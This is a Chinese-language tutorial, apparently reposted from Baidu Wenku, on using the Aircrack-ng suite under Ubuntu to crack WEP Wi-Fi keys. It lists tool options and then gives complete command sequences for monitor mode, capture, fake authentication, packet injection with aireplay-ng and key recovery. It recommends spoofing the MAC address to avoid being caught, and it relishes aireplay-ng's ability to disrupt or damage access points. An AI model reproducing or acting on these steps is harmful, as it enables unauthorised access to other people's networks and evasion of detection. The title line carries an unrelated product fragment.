不锈钢水池半成品 单槽:Ubuntu下Aircrack-ng工具包的使用

来源:百度文库 编辑:偶看新闻 时间:2024/04/29 09:28:39
Ubuntu下Aircrack-ng工具包的使用 安装:$sudo apt-get install aircrack-ng

Aircrack-ng无线破解工具包有很多工具,用到的工具主要有以下几个:

airmon-ng       处理网卡工作模式

airodump-ng     抓包

aircrack-ng     破解

aireplay-ng     发包,干扰


1) airmon-ng

启动无线网卡进入 Monitor 模式,

useage: airmon-ng [channel]

:启动,停止,检测

:指定无线网卡

[channel]:监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了


2) airodump-ng

抓包工具,我最喜欢用的,详细用法如下:

usage: airodump-ng [,,...]

Options:

–ivs :仅将抓取信息保存为 .ivs

–write    :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分

–beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的

Filter options:

–encrypt   : 使用密码序列过滤 AP

–netmask : 使用掩码过滤 AP

–bssid     : 使用 bssid 过滤 AP

-a : 过滤无关的客户端

–help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文

3)aireplay-ng

搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的 AP 设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.

usage: aireplay-ng

Filter options:

-b bssid : AP的 MAC

-d dmac:目标的 MAC

-s smac :来源的 MAC

-m len: 最小包长度

-n len: 最大包长度

-D: 禁用 AP 发现功能

Replay options:

-x nbpps : 每秒包数量

-p fctrl : 框架设定 (hex)

-a bssid : 设置AP的 mac

-c dmac: 设置目标的 MAC

-h smac: 设置来源的 mac

-g value : 改变环缓存大小 (默认8)

Fakeauth attack options:

-e essid : 设置目标 AP 的 SSID

-o npckts : 每秒爆破的包数量 (0 自动, 默认 1)

-q sec: 存活时间 秒

-y prga: 共享可信的 key流

–help : 显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付 那些不给出作者就引用的人,鄙视抄袭.

4)aircrack-ng

破解KEY,漫长的过程.漫不漫长取决于两个方面: 一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.

usage: aircrack-ng [options] <.cap / .ivs file(s)>

Common options:

-a : 暴破 (1/WEP, 2/WPA-PSK)

-e : 选择 essid 为目标

-b : 选择 ap的 mac 为目标,就是破解识别的关键字

-q : 使用安静模式,无数出模式

-C : 将所有的 AP 合并为一个虚拟的

–help: 显示这个帮助


就WEP破解说明,步骤:


步骤:

1. 修改无线网卡状态:先 down 掉

2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能

3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡

4. 修改无线网卡状态: up

5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标

6. 监听抓包:生成 .cap 或 .ivs

7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包

8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解

前面如何伪造网卡不在叙述,可参见这篇文章:
http://www.path8.net/tn/archives/40


具体步骤


1、首先确定是否有wlan0的无线网卡端口,ifconfig即可知道。若存在终端输入 sudo airmon-ng start wlan0 启动无线 网卡 的监控模式。



2、在终端中输入 sudo airodump -ng mon0 ,启动监控模式后无线端口是mon0(如果启动多次会按数字累加), 看看有哪些采用wep 加密的AP在线,然后按 ctrl+c 退出,保留终端。




3、 另开一个终端,输入 sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0 (-c后面的6为AP工作频道,--bissid后面的AP's MAC 是要欲破解AP的MAC地址,-w后的wep的是抓下来的数据包DATA 保存的文件名(可以随便取名),然后回车开始抓包。


(后来补上去的一张图,所以时间不对:))

4、再另开一个终端,输入 sudo aireplay-ng -1 0 -e ESSID -a AP's MAC -h My MAC mon0 与AP建立虚拟连接 (-h后面跟着的My MAC 是自己的无线网卡的MAC地址)


 这里以之前探测到的ESSID为P2P的为例。

5、建立虚拟连接成功后,输入sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0 进行注入,现在步骤3中数据包应该不断增长。



6、收集有5000个以上的DATA之后,另开一个终端,输入 sudo aircrack-ng wep*.cap 进行解密 (如果没算出来的话,继续等,Ubuntu aircrack-ng会在DATA每增加多5000个之后就自动再运行 ,直到算出密码为至)


7、破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的,除非重新启动电脑。



8、如果没有出现意外,你应该会很高兴的看到KEY FOUND!